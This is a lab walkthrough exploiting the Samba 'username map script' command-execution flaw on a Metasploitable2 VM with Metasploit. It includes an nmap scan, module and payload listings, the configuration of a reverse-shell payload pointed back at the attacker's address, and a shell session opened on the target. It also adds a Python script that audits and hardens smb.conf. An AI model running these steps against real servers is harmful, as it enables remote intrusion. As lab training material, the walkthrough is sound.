Cause
Samba passes unfiltered user input received through MS-RPC calls to /bin/sh when it invokes the external script defined by the "username map script" option in smb.conf, which allows remote command execution.
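Since the weakness is entirely a configuration choice, a defender can audit smb.conf for it directly. The following is an added example, not code from the original post or from the Samba project: it reads a constructed smb.conf in the shape the text describes, reports whether "username map script" is set in [global], and emits a hardened copy with the directive removed. The sample config and the script path in it are constructed values.

```python
import re

# Constructed sample in the shape the text describes: "username map script"
# in [global] makes smbd hand the client-supplied username to /bin/sh.
VULNERABLE_SMB_CONF = """\
[global]
   workgroup = WORKGROUP
   security = user
   ; parameter names are case-insensitive and ignore internal whitespace
   UserName Map Script = /etc/samba/scripts/mapusers.sh

[homes]
   comment = Home Directories
   browseable = no
"""

def _normalize(key: str) -> str:
    """Samba compares parameter names case-insensitively with whitespace removed."""
    return re.sub(r"\s+", "", key).lower()

def parse_smb_conf(text: str) -> dict:
    """Minimal smb.conf reader: {section: {normalized_key: value}}."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue                      # blank line or comment
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
        elif "=" in line and current is not None:
            key, value = line.split("=", 1)
            sections[current][_normalize(key)] = value.strip()
    return sections

def username_map_script(text: str):
    """Return the configured script path if the directive is set, else None."""
    return parse_smb_conf(text).get("global", {}).get("usernamemapscript")

def harden(text: str) -> str:
    """Drop the directive; a static 'username map' file is the safe replacement."""
    kept = []
    for raw in text.splitlines():
        head = raw.strip().split("=", 1)[0]
        if _normalize(head) == "usernamemapscript":
            kept.append("   ; username map script removed: it ran untrusted input via /bin/sh")
            continue
        kept.append(raw)
    return "\n".join(kept) + "\n"

if __name__ == "__main__":
    print("vulnerable:", username_map_script(VULNERABLE_SMB_CONF))
    print("hardened:", username_map_script(harden(VULNERABLE_SMB_CONF)))
```

Run it against a real /etc/samba/smb.conf by reading the file into `username_map_script`; a non-None result means the host still maps usernames through an external command.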
Lab environment
The target machine used here is Metasploitable2.
Linux attacking machine: 192.168.43.113
Linux target machine: 192.168.43.23
Exploit attack
First, scan the target to collect information about the services it exposes: use nmap to list the open ports and the applications behind them.
msf5 > nmap -sV 192.168.43.23
[*] exec: nmap -sV 192.168.43.23
Starting Nmap 7.70 ( https://nmap.org ) at 2020-09-02 22:22 CST
Nmap scan report for 192.168.43.23
Host is up (0.0012s latency).
Not shown: 977 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
53/tcp open domain ISC BIND 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
512/tcp open exec?
513/tcp open login?
514/tcp open shell?
1099/tcp open rmiregistry GNU Classpath grmiregistry
1524/tcp open bindshell Metasploitable root shell
2049/tcp open nfs 2-4 (RPC #100003)
2121/tcp open ftp ProFTPD 1.3.1
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open vnc VNC (protocol 3.3)
6000/tcp open X11 (access denied)
6667/tcp open irc UnrealIRCd
8009/tcp open ajp13?
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port514-TCP:V=7.70%I=7%D=9/2%Time=5F4FAAAA%P=x86_64-pc-linux-gnu%r(NULL
SF:,2B,"\x01Couldn't\x20get\x20address\x20for\x20your\x20host\x20\(kali\)\SF:n");
MAC Address: 00:0C:29:FA:DD:2A (VMware)
Service Info: Hosts: metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 130.39 seconds
The scan shows that the target is running the Samba 3.x service, so searching for "samba 3.x" finds the matching exploit module.
msf5 > search samba 3.x
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
1 auxiliary/admin/http/intersil_pass_reset 2007-09-10 normal Yes Intersil (Boa) HTTPd Basic Authentication Password Reset
2 auxiliary/admin/smb/samba_symlink_traversal normal No Samba Symlink Directory Traversal
3 auxiliary/dos/samba/lsa_addprivs_heap normal No Samba lsa_io_privilege_set Heap Overflow
4 auxiliary/dos/samba/lsa_transnames_heap normal No Samba lsa_io_trans_names Heap Overflow
5 auxiliary/dos/samba/read_nttrans_ea_list normal No Samba read_nttrans_ea_list Integer Overflow
6 auxiliary/scanner/rsync/modules_list normal Yes List Rsync Modules
7 auxiliary/scanner/smb/smb_uninit_cred normal Yes Samba _netr_ServerPasswordSet Uninitialized Credential State
8 auxiliary/scanner/ssh/eaton_xpert_backdoor 2018-07-18 normal Yes Eaton Xpert Meter SSH Private Key Exposure Scanner
9 exploit/freebsd/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (*BSD x86)
10 exploit/linux/http/efw_chpasswd_exec 2015-06-28 excellent No Endian Firewall Proxy Password Change Command Injection
11 exploit/linux/http/imperva_securesphere_exec 2018-10-08 excellent Yes Imperva SecureSphere PWS Command Injection
12 exploit/linux/http/zenoss_showdaemonxmlconfig_exec 2012-07-30 good Yes Zenoss 3 showDaemonXMLConfig Command Execution
13 exploit/linux/samba/chain_reply 2010-06-16 good No Samba chain_reply Memory Corruption (Linux x86)
14 exploit/linux/samba/is_known_pipename 2017-03-24 excellent Yes Samba is_known_pipename() Arbitrary Module Load
15 exploit/linux/samba/lsa_transnames_heap 2007-05-14 good Yes Samba lsa_io_trans_names Heap Overflow
16 exploit/linux/samba/setinfopolicy_heap 2012-04-10 normal Yes Samba SetInformationPolicy AuditEventsInfo Heap Overflow
17 exploit/linux/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (Linux x86)
18 exploit/multi/http/joomla_http_header_rce 2015-12-14 excellent Yes Joomla HTTP Header Unauthenticated Remote Code Execution
19 exploit/multi/http/plone_popen2 2011-10-04 excellent Yes Plone and Zope XMLTools Remote Command Execution
20 exploit/multi/http/rails_xml_yaml_code_exec 2013-01-07 excellent No Ruby on Rails XML Processor YAML Deserialization Code Execution
21 exploit/multi/http/struts2_code_exec_showcase 2017-07-07 excellent Yes Apache Struts 2 Struts 1 Plugin Showcase OGNL Code Execution
22 exploit/multi/http/struts_code_exec_classloader 2014-03-06 manual No Apache Struts ClassLoader Manipulation Remote Code Execution
23 exploit/multi/http/struts_default_action_mapper 2013-07-02 excellent Yes Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution
24 exploit/multi/samba/nttrans 2003-04-07 average No Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow
25 exploit/multi/samba/usermap_script 2007-05-14 excellent No Samba "username map script" Command Execution
26 exploit/osx/samba/lsa_transnames_heap 2007-05-14 average No Samba lsa_io_trans_names Heap Overflow
27 exploit/osx/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (Mac OS X PPC)
28 exploit/solaris/samba/lsa_transnames_heap 2007-05-14 average No Samba lsa_io_trans_names Heap Overflow
29 exploit/solaris/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (Solaris SPARC)
30 exploit/unix/http/quest_kace_systems_management_rce 2018-05-31 excellent Yes Quest KACE Systems Management Command Injection
31 exploit/unix/misc/distcc_exec 2002-02-01 excellent Yes DistCC Daemon Command Execution
32 exploit/unix/webapp/citrix_access_gateway_exec 2010-12-21 excellent Yes Citrix Access Gateway Command Execution
33 exploit/unix/webapp/joomla_akeeba_unserialize 2014-09-29 excellent Yes Joomla Akeeba Kickstart Unserialize Remote Code Execution
34 exploit/unix/webapp/joomla_contenthistory_sqli_rce 2015-10-23 excellent Yes Joomla Content History SQLi Remote Code Execution
35 exploit/unix/webapp/joomla_media_upload_exec 2013-08-01 excellent Yes Joomla Media Manager File Upload Vulnerability
36 exploit/unix/webapp/phpmyadmin_config 2009-03-24 excellent No PhpMyAdmin Config File Code Injection
37 exploit/windows/browser/awingsoft_web3d_bof 2009-07-10 average No AwingSoft Winds3D Player SceneURL Buffer Overflow
38 exploit/windows/fileformat/ms14_060_sandworm 2014-10-14 excellent No MS14-060 Microsoft Windows OLE Package Manager Code Execution
39 exploit/windows/http/apache_modjk_overflow 2007-03-02 great Yes Apache mod_jk 1.2.20 Buffer Overflow
40 exploit/windows/http/ia_webmail 2003-11-03 average No IA WebMail 3.x Buffer Overflow
41 exploit/windows/http/sambar6_search_results 2003-06-21 normal Yes Sambar 6 Search Results Buffer Overflow
42 exploit/windows/license/calicclnt_getconfig 2005-03-02 average No Computer Associates License Client GETCONFIG Overflow
43 exploit/windows/smb/group_policy_startup 2015-01-26 manual No Group Policy Script Execution From Shared Resource
44 post/linux/gather/enum_configs normal No Linux Gather Configurations
Select the exploit module, then list the payload modules compatible with it.
msf5 > use exploit/multi/samba/usermap_script
msf5 exploit(multi/samba/usermap_script) > show payloads
Compatible Payloads
===================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
1 cmd/unix/bind_awk normal No Unix Command Shell, Bind TCP (via AWK)
2 cmd/unix/bind_busybox_telnetd normal No Unix Command Shell, Bind TCP (via BusyBox telnetd)
3 cmd/unix/bind_inetd normal No Unix Command Shell, Bind TCP (inetd)
4 cmd/unix/bind_lua normal No Unix Command Shell, Bind TCP (via Lua)
5 cmd/unix/bind_netcat normal No Unix Command Shell, Bind TCP (via netcat)
6 cmd/unix/bind_netcat_gaping normal No Unix Command Shell, Bind TCP (via netcat -e)
7 cmd/unix/bind_netcat_gaping_ipv6 normal No Unix Command Shell, Bind TCP (via netcat -e) IPv6
8 cmd/unix/bind_perl normal No Unix Command Shell, Bind TCP (via Perl)
9 cmd/unix/bind_perl_ipv6 normal No Unix Command Shell, Bind TCP (via perl) IPv6
10 cmd/unix/bind_r normal No Unix Command Shell, Bind TCP (via R)
11 cmd/unix/bind_ruby normal No Unix Command Shell, Bind TCP (via Ruby)
12 cmd/unix/bind_ruby_ipv6 normal No Unix Command Shell, Bind TCP (via Ruby) IPv6
13 cmd/unix/bind_socat_udp normal No Unix Command Shell, Bind UDP (via socat)
14 cmd/unix/bind_zsh normal No Unix Command Shell, Bind TCP (via Zsh)
15 cmd/unix/generic normal No Unix Command, Generic Command Execution
16 cmd/unix/reverse normal No Unix Command Shell, Double Reverse TCP (telnet)
17 cmd/unix/reverse_awk normal No Unix Command Shell, Reverse TCP (via AWK)
18 cmd/unix/reverse_bash_telnet_ssl normal No Unix Command Shell, Reverse TCP SSL (telnet)
19 cmd/unix/reverse_ksh normal No Unix Command Shell, Reverse TCP (via Ksh)
20 cmd/unix/reverse_lua normal No Unix Command Shell, Reverse TCP (via Lua)
21 cmd/unix/reverse_ncat_ssl normal No Unix Command Shell, Reverse TCP (via ncat)
22 cmd/unix/reverse_netcat normal No Unix Command Shell, Reverse TCP (via netcat)
23 cmd/unix/reverse_netcat_gaping normal No Unix Command Shell, Reverse TCP (via netcat -e)
24 cmd/unix/reverse_openssl normal No Unix Command Shell, Double Reverse TCP SSL (openssl)
25 cmd/unix/reverse_perl normal No Unix Command Shell, Reverse TCP (via Perl)
26 cmd/unix/reverse_perl_ssl normal No Unix Command Shell, Reverse TCP SSL (via perl)
27 cmd/unix/reverse_php_ssl normal No Unix Command Shell, Reverse TCP SSL (via php)
28 cmd/unix/reverse_python normal No Unix Command Shell, Reverse TCP (via Python)
29 cmd/unix/reverse_python_ssl normal No Unix Command Shell, Reverse TCP SSL (via python)
30 cmd/unix/reverse_r normal No Unix Command Shell, Reverse TCP (via R)
31 cmd/unix/reverse_ruby normal No Unix Command Shell, Reverse TCP (via Ruby)
32 cmd/unix/reverse_ruby_ssl normal No Unix Command Shell, Reverse TCP SSL (via Ruby)
33 cmd/unix/reverse_socat_udp normal No Unix Command Shell, Reverse UDP (via socat)
34 cmd/unix/reverse_ssl_double_telnet normal No Unix Command Shell, Double Reverse TCP SSL (telnet)
35 cmd/unix/reverse_zsh normal No Unix Command Shell, Reverse TCP (via Zsh)
Set the cmd/unix/reverse payload, the IP address of the target machine (RHOSTS), the port to exploit (RPORT) and the IP address of the host launching the attack (LHOST).
msf5 exploit(multi/samba/usermap_script) > set payload cmd/unix/reverse
payload => cmd/unix/reverse
msf5 exploit(multi/samba/usermap_script) > set RHOSTS 192.168.43.23
RHOSTS => 192.168.43.23
msf5 exploit(multi/samba/usermap_script) > set RPORT 445
RPORT => 445
msf5 exploit(multi/samba/usermap_script) > set LHOST 192.168.43.113
LHOST => 192.168.43.113
msf5 exploit(multi/samba/usermap_script) > options
Module options (exploit/multi/samba/usermap_script):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.168.43.23 yes The target address range or CIDR identifier
RPORT 445 yes The target port (TCP)
Payload options (cmd/unix/reverse):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.43.113 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
With the options set, launch the module with exploit or run.
msf5 exploit(multi/samba/usermap_script) > run
[*] Started reverse TCP double handler on 192.168.43.113:4444
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo oQwX81x659bJ0os8;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "oQwX81x659bJ0os8\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 4 opened (192.168.43.113:4444 -> 192.168.43.23:49794) at 2020-09-02 23:02:57 +0800
Once the attack succeeds, msf hands back a shell on the target host. To confirm that the shell really belongs to the target machine, query its host name, user name and IP address.
ifconfig
eth0 Link encap:Ethernet HWaddr 00:0c:29:fa:dd:2a
inet addr:192.168.43.23 Bcast:192.168.43.255 Mask:255.255.255.0
inet6 addr: fe80::20c:29ff:fefa:dd2a/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:2410 errors:0 dropped:0 overruns:0 frame:0
TX packets:1961 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:190106 (185.6 KB) TX bytes:138231 (134.9 KB)
Interrupt:17 Base address:0x2000
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:278 errors:0 dropped:0 overruns:0 frame:0
TX packets:278 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:110249 (107.6 KB) TX bytes:110249 (107.6 KB)
The output shows the target's address, 192.168.43.23, so the command was executed on the target machine.
Summary
Five minutes of attacking after two hours of setup. Another simple and fulfilling day!